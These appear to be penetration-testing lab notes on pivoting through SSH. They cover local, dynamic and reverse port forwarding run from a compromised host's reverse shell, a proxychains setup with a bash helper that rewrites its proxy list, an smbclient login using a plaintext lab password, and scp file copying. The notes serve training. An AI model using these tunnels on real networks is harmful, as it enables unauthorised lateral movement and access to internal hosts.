SSH - 22
ssh
Secure Shell
Capabilities
Local Forwarding
# Connect to 10.4.50.215 and listen on 4455 (all interfaces); anything that hits 4455 is forwarded to 172.16.50.217:445 via 10.4.50.215
ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215
# Connect to 10.4.50.215 and start a SOCKS proxy on 9999 (all interfaces); any destination reachable from 10.4.50.215 can be reached through it
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215
Remote Forwarding (reverse)
# Connect to our attack box, listen on 127.0.0.1:2345 there, and forward all traffic to 10.4.50.215:5432 via the host we run this from
ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@$OUR_IP
# Connect to our attack box and make it run a SOCKS proxy on port 1080 (reverse dynamic forwarding, OpenSSH 7.6+) whose traffic exits from the host we run this from
ssh -N -R 1080 kali@$OUR_IP
Note: a -R listener only binds to a non-loopback address on the attack box if its sshd has GatewayPorts set to yes or clientspecified; otherwise it is bound to 127.0.0.1 regardless of the address given.
-N   no remote command (no shell), just the tunnel
-L   local port forwarding
-D   dynamic port forwarding (SOCKS proxy)
-R   remote port forwarding
In the 2nd example
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215
we are running the ssh command from a reverse shell we have already established on 192.168.50.63. Once the command is running, 192.168.50.63 becomes a SOCKS proxy for us: we send traffic to port 9999 on it, ssh carries that traffic over the SSH session to 10.4.50.215, and 10.4.50.215 forwards it to its final destination. The 0.0.0.0 bind address matters here: without it the SOCKS listener binds to 127.0.0.1 on 192.168.50.63 and our attack box cannot reach it.
We can then use proxychains to push traffic through 192.168.50.63 by adding the following to our /etc/proxychains4.conf
# ... At the very bottom of the file, we set the ProxyList to only point to port 9999.
# Remove or comment out the default Tor entry (socks4 127.0.0.1 9050): with strict_chain, an unreachable proxy in the list makes every connection fail.
[ProxyList]
socks5 192.168.50.63 9999
Now in the following command
proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
the connection is first intercepted by proxychains and sent to 192.168.50.63:9999, as specified in our /etc/proxychains4.conf. The SOCKS listener on 192.168.50.63 hands it to the SSH session with 10.4.50.215 (the sshd on port 22, not port 9999), and 10.4.50.215 then opens the connection to its final destination of 172.16.50.217:445.
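As an added example that is not part of the original notes, the bash script below edits a proxychains config the way the step above describes: it replaces everything after [ProxyList] with a single socks5 entry for our listener and drops the stock Tor default (socks4 127.0.0.1 9050), which under strict_chain would otherwise break every proxychains connection. The sample config it writes is constructed here to mirror the stock Kali file, and the function names set_proxylist, proxylist_entries and make_sample_conf are this example's own.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): point proxychains at our SSH SOCKS listener.
# Assumption: the config uses the stock layout where [ProxyList] is the last section.
set -eu

# set_proxylist CONF HOST PORT [TYPE]
# Replace everything after the [ProxyList] header with one entry (default type socks5).
set_proxylist() {
    local conf="$1" host="$2" port="$3" type="${4:-socks5}"
    # validate the port before touching the file
    case "$port" in
        ''|*[!0-9]*) echo "bad port: $port" >&2; return 1 ;;
    esac
    [ "$port" -ge 1 ] && [ "$port" -le 65535 ] || { echo "bad port: $port" >&2; return 1; }
    grep -q '^\[ProxyList\]' "$conf" || { echo "no [ProxyList] section in $conf" >&2; return 1; }
    local tmp
    tmp="$(mktemp)"
    # keep everything up to and including the header, then append our single entry;
    # the old entries (including the Tor default) are dropped
    sed '/^\[ProxyList\]/q' "$conf" > "$tmp"
    printf '%s %s %s\n' "$type" "$host" "$port" >> "$tmp"
    cat "$tmp" > "$conf"
    rm -f "$tmp"
}

# proxylist_entries CONF
# Print the active (non-comment, non-blank) entries under [ProxyList].
proxylist_entries() {
    sed -n '/^\[ProxyList\]/,$p' "$1" | sed '1d' \
        | grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' || true
}

# make_sample_conf CONF
# Constructed sample mirroring the stock Kali file: strict_chain plus the Tor default.
make_sample_conf() {
    cat > "$1" <<'EOF'
# proxychains.conf  VER 4.x (constructed sample)
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# add proxy here ...
# defaults set to "tor"
socks4 127.0.0.1 9050
EOF
}

# demo: rewrite a throwaway copy of the sample config and show the resulting list
demo() {
    local conf
    conf="$(mktemp)"
    make_sample_conf "$conf"
    set_proxylist "$conf" 192.168.50.63 9999
    proxylist_entries "$conf"
    rm -f "$conf"
}
```

Run demo to see the result on the sample; on a real box call set_proxylist /etc/proxychains4.conf 192.168.50.63 9999 as root. The rewrite keeps strict_chain, proxy_dns and the timeouts untouched and only touches the list, so the chain stays a single hop through the SSH SOCKS listener.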
scp
Copy files over SSH
Capabilities
# Copy files from target to attack box
scp <user>@<remote-host>:<path> <local-path>
# Copy files from attack box to target
scp <file> <user>@<remote-host>:<path>
Specify -r for a directory. Note that scp takes the port as -P (capital), unlike ssh -p.